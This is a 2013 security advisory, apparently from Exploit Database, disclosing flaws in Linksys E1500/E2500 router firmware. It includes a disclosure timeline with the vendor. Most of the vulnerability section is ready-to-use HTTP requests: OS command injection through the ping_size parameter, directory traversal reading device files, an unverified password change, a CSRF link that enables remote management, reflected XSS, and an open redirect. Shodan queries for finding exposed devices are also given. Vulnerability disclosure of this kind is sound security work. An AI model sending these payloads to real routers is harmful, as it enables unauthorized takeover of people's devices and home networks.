Linksys E1500/E2500 – Multiple Vulnerabilities

• Exploit Database
• 47 阅读

• 作者： m-1-k-3
  日期： 2013-02-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/24475/

• Device Name: Linksys E1500 / E2500
  Vendor: Linksys
  
  ============ Device Description: ============
  
  The Linksys E1500 is a Wireless-N Router with SpeedBoost. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files.
  
  The installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page.
  
  Source: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=...
  
  ============ Vulnerable Firmware Releases - e1500: ============
  
  Firmware-Version: v1.0.00 - build 9 Feb. 17, 2011
  Firmware-Version: v1.0.04 - build 2 Mär. 8, 2012
  Firmware-Version: v1.0.05 - build 1 Aug. 23, 2012
  
  ============ Vulnerable Firmware Releases - e2500: ============
  
  Firmware Version: v1.0.03 (only tested for known OS command injection)
  
  Other versions may also be affected.
  
  ============ Shodan Torks ============
  
  Shodan Search: linksys e1500
  Shodan Search: linksys e2500
  
  ============ Vulnerability Overview: ============
  
  * OS Command Injection / E1500 and E2500 v1.0.03 
  
  => Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26
  
  The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.
  You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.
  
  Example Exploit:
  POST /apply.cgi HTTP/1.1
  Host: 192.168.178.199
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Proxy-Connection: keep-alive
  Referer: http://192.168.178.199/Diagnostics.asp
  Authorization: Basic xxxx
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 185
  Connection: close
  
  submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=
  
  Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:
  
  http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=
  
  Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png
  
  * Directory traversal - tested on E1500: 
  
  => parameter: next_page
  
  Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.
  
  Request:
  POST /apply.cgi HTTP/1.1
  Host: 192.168.178.199
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Proxy-Connection: keep-alive
  Referer: http://192.168.178.199/Wireless_Basic.asp
  Authorization: Basic YWRtaW46YWRtaW4=
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 75
  
  submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version
  
  Response:
  HTTP/1.1 200 Ok
  Server: httpd
  Date: Thu, 01 Jan 1970 00:00:29 GMT
  Cache-Control: no-cache
  Pragma: no-cache
  Expires: 0
  Content-Type: text/html
  Connection: close
  
  Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012
  
  Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png
  
  * For changing the current password there is no request of the current password - tested on E1500 
  
  With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
  
  Example Request:
  POST /apply.cgi HTTP/1.1
  Host: 192.168.1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Proxy-Connection: keep-alive
  Referer: http://192.168.1.1/Management.asp
  Authorization: Basic xxxx
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 311
  
  submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
  
  * CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500: 
  
  http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
  
  * Reflected Cross Site Scripting - tested on E1500 
  
  => Parameter: wait_time=3'%3balert('pwnd')//
  
  Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.
  
  Example Exploit:
  POST /apply.cgi HTTP/1.1
  Host: 192.168.178.199
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Proxy-Connection: keep-alive
  Referer: http://192.168.178.199/Wireless_Basic.asp
  Authorization: Basic xxxx
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 300
  
  submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
  
  Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png
  
  * Redirection - tested on E1500 
  
  => Paramter: submit_button=http://www.pwnd.pwnd%0a
  
  Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.
  
  Example Exploit:
  POST /apply.cgi HTTP/1.1
  Host: 192.168.178.199
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Proxy-Connection: keep-alive
  Referer: http://192.168.178.199/Wireless_Basic.asp
  Authorization: Basic xxxx
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 290
  
  submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
  
  Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png
  
  ============ Solution ============
  
  No known solution available.
  
  ============ Credits ============
  
  The vulnerability was discovered by Michael Messner
  Mail: devnull#at#s3cur1ty#dot#de
  Web: http://www.s3cur1ty.de
  Advisory URL: http://www.s3cur1ty.de/m1adv2013-004
  Twitter: @s3cur1ty_de
  
  ============ Time Line: ============
  
  October 2012 - discovered vulnerability
  21.10.2012 - contacted Linksys with vulnerability details
  23.10.2012 - Linksys requestet to check new firmware v1.0.05 build 1
  27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1
  27.10.2012 - contacted Linksys with vulnerabilty details in release v1.0.05 build 1
  29.10.2012 - Linksys responded with case number
  13.11.2012 - /me requested update of the progress
  15.11.2012 - Linksys sends Beta Agreement
  16.11.2012 - Linksys sends the Beta Firmware for testing
  16.11.2012 - tested Beta version
  18.11.2012 - informed Linksys about the results
  30.11.2012 - reported the same OS Command injection vulnerability in model E2500
  10.12.2012 - /me requested update of the progress
  23.12.2012 - Update to Linksys with directory traversal vulnerability
  09.01.2013 - Case closed
  05.02.2013 - public release
  
  ===================== Advisory end =====================